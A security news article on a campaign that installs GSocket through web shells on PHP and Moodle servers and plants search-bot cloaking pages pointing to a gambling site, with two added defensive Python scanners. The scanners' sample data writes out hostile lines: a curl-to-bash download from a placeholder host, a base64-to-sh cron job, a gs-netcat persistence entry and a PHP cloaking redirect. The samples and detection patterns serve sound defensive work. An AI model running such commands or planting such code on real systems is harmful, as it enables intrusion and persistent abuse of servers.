A surge of cyberattacks using Python-based bots to target thousands of websites has been used to boost various gambling-related websites.
Researchers revealed that the campaign is tied to gambling platforms in Indonesia and targets web servers running PHP-based applications. The campaign may also have been coordinated in response to increased government surveillance of the online gambling industry.
An initial assessment of the attack observed millions of requests from a Python client that included a command to install GSocket, an open-source application that can establish a communication channel between two devices regardless of network boundaries.
GSocket has recently been used by various cybercriminal groups in several cryptojacking operations, including exploiting the utility’s access to place malicious JavaScript code on websites to steal payment information.
Hackers commonly use Python-based bots to target servers that run a specific LMS.
The attack chain of this new cybercriminal activity, which leverages Python-based bots, includes attempts to launch GSocket through pre-existing web shells on already compromised servers. Most of its operations targeted servers running the popular learning management system (LMS) Moodle.
In addition, the attacks include changes to the ‘crontab’ and ‘bashrc’ system files to ensure that GSocket continues to run even after the web shells are removed.
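The persistence described above leaves traces in exactly the two files named, so a defender can scan them for indicators. The following is an added example, not code from the article or from the researchers: a small Python scanner that walks a crontab dump and a `.bashrc` and reports lines referencing `gs-netcat`/gsocket or generic persistence tricks (a download piped to a shell, a base64-decoded command). The binary name `gs-netcat` and the gsocket name are real; the remaining heuristics, the sample file contents, the placeholder secret and the placeholder download host are this example's own constructions.

```python
import re

# Indicators for the crontab/.bashrc persistence pattern. gs-netcat and gsocket
# are the tool's real names; the other two patterns are generic heuristics
# chosen for this example, not details taken from the article.
INDICATORS = [
    ("gs-netcat binary", re.compile(r"\bgs-netcat\b")),
    ("gsocket reference", re.compile(r"gsocket", re.IGNORECASE)),
    ("download piped to shell", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b")),
    ("base64-decoded command", re.compile(r"\bbase64\s+(-d|--decode)\b")),
]


def scan_text(source: str, text: str) -> list:
    """Return one finding per non-comment line that matches an indicator."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank lines and comments carry no commands
        for name, pattern in INDICATORS:
            if pattern.search(stripped):
                findings.append({"source": source, "line": lineno,
                                 "indicator": name, "text": stripped})
                break  # report the first matching indicator only
    return findings


def scan_persistence(crontab: str, bashrc: str) -> list:
    """Scan a crontab dump and a .bashrc, the two files the article names."""
    return scan_text("crontab", crontab) + scan_text(".bashrc", bashrc)


# Constructed sample input; the secret and the download host are placeholders.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
@reboot /bin/sh -c 'echo "ZWNobyBoaQ==" | base64 -d | sh'
*/5 * * * * /var/www/.config/gs-netcat -s PLACEHOLDER_SECRET
"""

SAMPLE_BASHRC = """\
export PATH=$HOME/bin:$PATH
alias ll='ls -la'
curl -fsSL https://placeholder.invalid/deploy.sh | bash
"""

if __name__ == "__main__":
    for f in scan_persistence(SAMPLE_CRONTAB, SAMPLE_BASHRC):
        print(f"{f['source']}:{f['line']} [{f['indicator']}] {f['text']}")
```

On a live host the same functions would be fed `crontab -l -u <user>` output for every account that can write to the web root and each of those users' `.bashrc` files; a hit is a prompt to inspect the referenced binary, not a verdict on its own.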
The research also uncovered that the threat actors are utilising the access GSocket grants to these servers to distribute PHP files containing HTML content that refers to online gambling services aimed explicitly at Indonesian customers.
The top of each PHP file contained code that served the page only to search-engine bots, while regular visitors were redirected to another URL. The tactic's objective is to catch users searching for known gambling services and redirect them to another domain.
The researchers claimed that the redirections land on a popular Indonesian gambling website called “pktoto[.]cc.”
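The cloaking described above combines three things in one file: a branch on the request's user agent, a list of search-bot names, and a redirect for everyone who is not a bot. The following is an added example, not code from the article or the researchers: a Python static check that flags PHP source only when all three appear together, since each alone is common in legitimate code, and that pulls the redirect target out for triage. The regexes cover the standard PHP constructs (`$_SERVER['HTTP_USER_AGENT']`, `header('Location: ...')`, WordPress's `wp_redirect()`); the bot-name list, the sample PHP and the placeholder redirect host are this example's own constructions, not the domain named in the article.

```python
import re
from dataclasses import dataclass, field

# PHP constructs that make up the cloaking pattern. The bot-name list is this
# example's own choice; extend it to match the crawlers your site sees.
UA_CHECK = re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]")
BOT_NAMES = re.compile(r"googlebot|bingbot|yandex|duckduckbot|baiduspider|slurp", re.IGNORECASE)
REDIRECT = re.compile(r"header\s*\(\s*['\"]Location\s*:|wp_redirect\s*\(", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"]+")


@dataclass
class CloakingReport:
    checks_user_agent: bool
    names_search_bots: bool
    redirects: bool
    redirect_targets: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # All three together form the cloaking pattern; any one alone is benign too often.
        return self.checks_user_agent and self.names_search_bots and self.redirects


def analyse_php(source: str) -> CloakingReport:
    """Flag PHP that branches on the user agent, names search bots, and redirects."""
    targets = []
    for line in source.splitlines():
        if REDIRECT.search(line):
            targets.extend(URL.findall(line))  # where non-bot visitors are sent
    return CloakingReport(
        checks_user_agent=bool(UA_CHECK.search(source)),
        names_search_bots=bool(BOT_NAMES.search(source)),
        redirects=bool(REDIRECT.search(source)),
        redirect_targets=targets,
    )


# Constructed samples; the redirect host is a placeholder, not the article's domain.
SAMPLE_CLOAKED = """\
<?php
$ua = $_SERVER['HTTP_USER_AGENT'];
if (!preg_match('/googlebot|bingbot/i', $ua)) {
    header('Location: https://redirect-target.example/', true, 302);
    exit;
}
?>
<html><head><title>Constructed page shown only to crawlers</title></head><body></body></html>
"""

SAMPLE_BENIGN = """\
<?php
$is_mobile = stripos($_SERVER['HTTP_USER_AGENT'], 'Mobile') !== false;
echo $is_mobile ? 'mobile layout' : 'desktop layout';
"""

if __name__ == "__main__":
    for name, src in (("cloaked", SAMPLE_CLOAKED), ("benign", SAMPLE_BENIGN)):
        r = analyse_php(src)
        print(f"{name}: suspicious={r.suspicious} targets={r.redirect_targets}")
```

Run it over every `.php` file under the web root, including directories the application itself never writes to; the benign sample shows why the three conditions are combined, since a mobile-layout switch also reads the user agent but neither names crawlers nor redirects. A positive hit is worth confirming dynamically by requesting the page once with a crawler user agent and once with a browser one and comparing the responses.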
The development follows separate research that uncovered a large-scale malware campaign targeting over 5,000 sites worldwide to create rogue admin accounts, install a malicious plugin from a remote server, and siphon credential data back to it.
WordPress site owners should therefore keep their plugins updated, block rogue domains at the firewall, scan for unexpected admin accounts or plugins, and remove any they find to counter these ongoing cybercriminal activities.
